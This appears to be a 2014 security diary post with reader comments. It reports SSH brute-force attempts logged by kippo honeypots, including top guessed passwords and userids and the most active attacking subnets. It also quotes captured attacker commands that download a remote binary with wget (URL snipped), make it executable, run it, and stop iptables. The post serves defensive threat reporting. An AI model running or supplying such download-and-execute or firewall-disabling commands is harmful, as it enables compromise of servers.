Honey Pot Entertainment - SSH

Published: 2014-12-27
Last Updated: 2014-12-27 16:43:43 UTC
by Mark Hofman (Version: 1)
6 comment(s)

The Christmas period is a nice time to play with some honeypots and share some of the info they have been collecting.  Currently I only have two functioning, both of them are located in the US. Each receives 20K or more login attempts per day. I'm using a standard kippo installation, running as a non root user and using authbind to run the honeypot on port 22.  Results are sent to a logging server for collection.   

One of the honeypots has no valid password so it will always fail I'm mainly interested in collecting the various userid and passwords used in the guessing attempts.  The other one does have a valid password and I regularly expand its interaction by providing the correct responses utilising the kippo capabilities.  The password can be changed by modifying the data/userdb.txt file in the kippo subdirectory.  The interaction can be improved by issuing a command and capturing the output and placing the resulting file in txtcmds directory.  For example sftp is often the first command issued. Locate where sftp is running from (usually /usr/bin).  Create the structure under the honeyfs directory, e.g. honeyfs/usr/bin/sftp. Issue the command sftp and capture the output to a file called sftp and place it in the txtcmds directory, follow the same structure so txtcmds/usr/bin/sftp.  Now when the command is entered it will get a response and hopefully you will get additional results.   

So some stats for December: 

  • Unique Passwords used: 136,029
  • Unique Userids used: 305 
  • Unique Atatcking IP Addresses: 343
Most common guessed password   Most Common Userid  
admin 1528 root 612564
123456 671 admin 13615
12344321 438 ubuntu 127
default 434 oracle 51
a1s2d3f4 433 test 41
root 430 ftpuser 31
q1w2e3 426 user 29
qwer1234 422 support 28
111111 420 ubnt 26
1q2w3e4r5t 417 guest 23

Locations

Dirtiest subnets

The following are the /24 subnets that are most active with a high number of hosts from the same subnet attacking.  

  • 103.41.124.0 - HK, CN  - AS 63854
  • AS 4134  - https://isc.sans.edu/asreport.html?as=4134
    • 122.225.109.0 - Huzhou, CN
    • 122.225.97.0  - Huzhou, CN
    • 122.225.103.0 - Huzhou, CN
    • 218.2.0.0 - Nanjing, CN
    • 222.186.34.0  - Nanjing, CN
    • 61.174.50 - Huzhou, CN
    • 61.175.51 - Huzhou, CN

​Based on the above I'm quite comfortable in saying that blocking anything coming from AS4134 would not be a bad idea. 

Passwords

The passwords used in the attempts are quite varied and range from the simple as shown above to much more esoteric and complex passwords such as !!QAZ@@WSX##EDC, !!Er.HAA22a098yIGH@_Z@, %TGBVFR$#EDCXSW@, WORLDEDU20121123. 

Commands Issued

  • ls -la /var/run/sftp.pid
  • #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    • wget http://---snip---/install/8004
    • chmod +x 8004
    • ./8004
  • uname
  • service iptables stop

 

There has been some increase in scanning over the past month or so.  My previous Honeypot run in August 2014 would max out at 1500 attempts per day. The main surprise to me was the wide range of passwords being used.  A number of them seem to relate directly to specific types of hardware installed such as modem/routers.  Others look like quite robust passwords and may have come from the various password compromises this year.   The main message is that if you are running an SSH server it will get attacked and you'd best have some decent passwords and ideally use certificate authentication to secure the server.  

If you want to run your own, I'm a fan of kippo, it is simple to set up and there are plenty of guides on how to do it.  Make sure you run it on a box that is not a production device and secure it. You do not want to become a staging point for attacks.  

If you want to submit your kippo logs, Dr J in this diary https://isc.sans.edu/diary/New+Feature+Live+SSH+Brute+Force+Logs+and+New+Kippo+Client/18433 provides the perl to do so.  

Enjoy

Mark H - Shearwater

Keywords:
6 comment(s)

Comments

also see our collector for kippo honeypots here: https://isc.sans.edu/clients/kippo/kippodshield.pl and the data collected here https://isc.sans.edu/ssh.html
61.153.110.0/23 also seems to be a hot candidate for blacklisting.. hosts from that range have been knocking on my SSH rather intensively in the last few days.

On my private boxes, I have long moved to whitelist-only.. maintaining the blacklists has become too tiresome, with the high number of separate IP ranges that China (as worst offender) owns.
Does anyone know of a manageable way to totally lock down your home network's outbound firewall rules and then white list as needed? I am working on a program to do this for pfsense. I would be very interested if there are any programs or scripts that make firewall white listing easier to manage.
Possibly slightly wide of the main topic....

I am wondering why most Western ISPs that cater for the home and small business market don't just blacklist ALL IP blocks for North Korea, China, Russia, Middle East, etc. If customers really need access to these IP blocks - they could specifically request them ?

As a hopefully typical IT professional, 100% of my Web and Internet activity takes place within the UK/GB, USA, Canada, Australia
, New Zealand, France, Germany and Italy countries.

Surely, this would help to cut down the number of hacking/cracking/malicious attacks done against western users that appear to originate from these IP blocks ?

I realise that this wouldn't protect from western hosted botnets and trojaned PCs - but, it would be a useful starting point.

There may be good reasons why this isn't possible - but, if I had enough IT equipment to justify my own professional grade Cisco or equivalent type router and Firewall - then this is one of the first defence policies that I would enact.

Is this a worthwhile discussion point ?
What is the best way to block IP ranges based on ASN (at the server and/or firewall level)? Are there any tools to help.
I believe that blocking all countries that you don't need to communicate with is the future. And for home networks, a way to quickly and simply whitelist is badly needed. It is silly for my mother-in-law, for example, to have a network that freely communicates with China and Russia. She has no need for it.

Looking at it from a law enforcement perspective. If a PC in Nebraska is attacking your network, as a US citizen, you have a legal avenue to stop it. If the attack is coming from Brazil, Russia, or China, there is no way to realistically prosecute.

Diary Archives